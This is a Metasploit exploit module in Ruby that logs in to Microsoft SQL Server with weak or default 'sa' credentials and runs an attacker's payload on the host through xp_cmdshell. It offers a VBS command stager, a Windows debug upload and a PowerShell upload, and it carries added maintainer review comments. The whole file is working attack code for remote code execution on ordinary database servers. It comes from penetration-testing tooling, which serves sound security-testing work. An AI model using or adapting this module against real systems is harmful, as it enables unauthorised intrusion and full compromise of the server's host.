##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
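class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MSSQL
  include Msf::Exploit::CmdStagerVBS
  #include Msf::Exploit::CmdStagerDebugAsm
  #include Msf::Exploit::CmdStagerDebugWrite
  #include Msf::Exploit::CmdStagerTFTP

  # Module metadata and operator-facing options.
  #
  # Every delivery path in this module ends in xp_cmdshell (see
  # execute_command and the upload helpers called from #exploit), so the
  # credentials supplied through the MSSQL mixin must map to a principal
  # allowed to run it. The references describe the weak / blank 'sa'
  # password conditions this module was written against.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft SQL Server Payload Execution',
      'Description'    => %q{
        This module will utilize multiple methods in payload delivery on a
        given system all through MSSQL. JDuck's method will utilize wscript
        in order to execute the initial stager. ReL1K's method will utilize
        either Windows Debug which is currently installed on anything pre
        Windows 7 and utilize binary to hex conversion methods. ReL1K's
        newest method can utilize powershell for the conversion methods and
        can only be used on Server 2008 and Windows 7 based systems or with
        other systems that have installed powershell.
      },
      'Author'         =>
        [
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',
          'jduck'
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          # 'sa' password in logs
          [ 'CVE', '2000-0402' ],
          [ 'OSVDB', '557' ],
          [ 'BID', '1281' ],
          # blank default 'sa' password
          [ 'CVE', '2000-1209' ],
          [ 'OSVDB', '15757' ],
          [ 'BID', '4797' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 30 2000'
    ))

    register_options(
      [
        OptBool.new('VERBOSE',       [ false, 'Enable verbose output', false ]),
        # Description fixed: the old text ("Wait for user input before
        # returning from exploit") was unrelated to what this flag selects.
        OptBool.new('UseCmdStager',  [ false, 'Deliver the payload with the VBS command stager (wscript) instead of the debug/PowerShell upload path', true ]),
        # NOTE(review): this option is registered but not read anywhere in
        # this file; the non-PowerShell branch of #exploit always calls
        # mssql_upload_exec. Whether the mixin consults it is not visible
        # here -- confirm before relying on it.
        OptBool.new('UseWinDebug',   [ false, 'Use Windows debug for payload conversion, 2k3 and below only', false ]),
        OptBool.new('UsePowerShell', [ false, 'Use PowerShell for the payload conversion on Server 2008 and Windows 7', false ]),
      ])
  end

  # Callback required by the CmdStager mixin: each staged command line is
  # pushed through xp_cmdshell on the authenticated MSSQL connection.
  #
  # @param cmd  [String] command line produced by the stager (not operator
  #   supplied; built from the generated payload)
  # @param opts [Hash]   stager options; unused here but part of the callback
  #   signature the mixin expects
  def execute_command(cmd, opts)
    mssql_xpcmdshell(cmd, datastore['VERBOSE'])
  end

  # Authenticates once, delivers the payload via the selected method, then
  # hands off to the handler.
  #
  # The original code attempted mssql_login_datastore twice in a row (a
  # duplicated guard); that produced a second, pointless authentication
  # against the target for every run, so the guard now runs a single time.
  def exploit
    unless mssql_login_datastore
      print_status("Invalid SQL Server credentials")
      return
    end

    if datastore['UseCmdStager']
      # :nodelete => true presumably leaves the staged artifacts on the
      # target once the payload runs (operator clean-up needed) -- TODO
      # confirm against the CmdStager mixin's handling of this option.
      execute_cmdstager({ :linemax => 1500, :nodelete => true })
      #execute_cmdstager({ :linemax => 1500 })
    else
      # One EXE serves both upload paths; only the transport differs.
      exe = generate_payload_exe
      if datastore['UsePowerShell']
        powershell_upload_exec(exe)
      else
        # Legacy path provided by the MSSQL mixin.
        mssql_upload_exec(exe, datastore['VERBOSE'])
      end
    end

    handler
    disconnect
  end

end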